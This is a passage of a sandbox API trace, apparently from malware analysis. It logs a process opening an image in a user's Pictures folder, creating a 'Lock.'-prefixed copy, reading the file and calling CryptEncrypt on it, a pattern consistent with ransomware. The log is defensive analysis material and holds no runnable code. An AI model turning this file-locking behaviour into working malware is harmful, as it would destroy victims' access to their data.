(lpFileName="C:\\Users\\FD1HVy\\Pictures/yuOTM-ydpavUWyQnpT.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\yuotm-ydpavuwyqnpt.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0256.485] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0256.485] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0256.485] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0256.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0256.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0256.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0256.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0256.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0256.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0256.485] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0256.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0256.486] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0256.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0256.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0256.486] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0256.486] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0256.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0256.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0256.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0256.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0256.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0256.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0256.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0256.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0256.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0256.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0256.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0256.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0256.486] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0256.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0256.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0256.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0256.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0256.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0256.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0256.487] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.yuOTM-ydpavUWyQnpT.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.yuotm-ydpavuwyqnpt.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0256.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0256.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0256.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0256.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0256.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0256.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0256.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0256.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0256.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0256.488] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0256.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0256.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0256.488] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0256.488] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0256.488] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0256.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0256.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0256.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0256.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0256.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0256.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0256.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0256.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0256.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0256.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0256.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0256.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0256.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0256.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0256.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe50020 [0256.492] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0256.492] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0256.495] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x1daa, lpOverlapped=0x0) returned 1 [0256.496] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0256.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0256.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0256.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0256.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0256.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11daa) returned 0x2f14010 [0256.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe50020 | out: hHeap=0x970000) returned 1 [0256.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0256.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0256.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0256.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0256.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0256.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0256.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0256.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0256.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11daa) returned 0x2f25dc8 [0256.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0256.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0256.502] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0256.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0256.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0256.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0256.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0256.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11daa) returned 0x2f14010 [0256.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0256.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0256.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0256.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0256.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0256.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0256.502] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0256.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0256.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0256.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0256.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0256.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0256.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0256.503] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0256.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f10 [0256.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0256.503] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0256.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0256.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0256.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0256.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0256.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0256.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0256.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0256.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0256.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11daa) returned 0x2f14010 [0256.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0256.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54db8 [0256.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0256.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e48 [0256.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0256.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0256.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0256.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e78 [0256.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0256.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0256.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0256.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51460 [0256.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0256.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0256.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0256.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0256.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0256.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11daa) returned 0x2f37b80 [0256.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0256.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0256.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0256.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0256.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0256.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0256.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0256.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0256.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0256.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0256.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0256.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0256.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0256.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0256.506] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.506] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.506] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.506] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.506] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.506] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.507] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0256.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0256.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0256.507] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0256.507] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0256.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0256.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0256.507] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0256.507] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0256.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0256.507] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0256.507] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0256.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ae8 | out: hHeap=0x970000) returned 1 [0256.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0256.588] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0256.588] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0256.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0256.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0256.588] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0256.588] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.588] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.588] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0256.588] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.588] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0256.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0256.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0256.589] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0256.591] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0256.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51ad8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0256.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0256.592] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0256.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0256.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0256.592] CryptEncrypt (in: hKey=0xa874d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x11daa, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x11db0) returned 1 [0256.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0256.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0256.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0256.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0256.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0256.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0256.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0256.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0256.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0256.593] HeapFree (in: 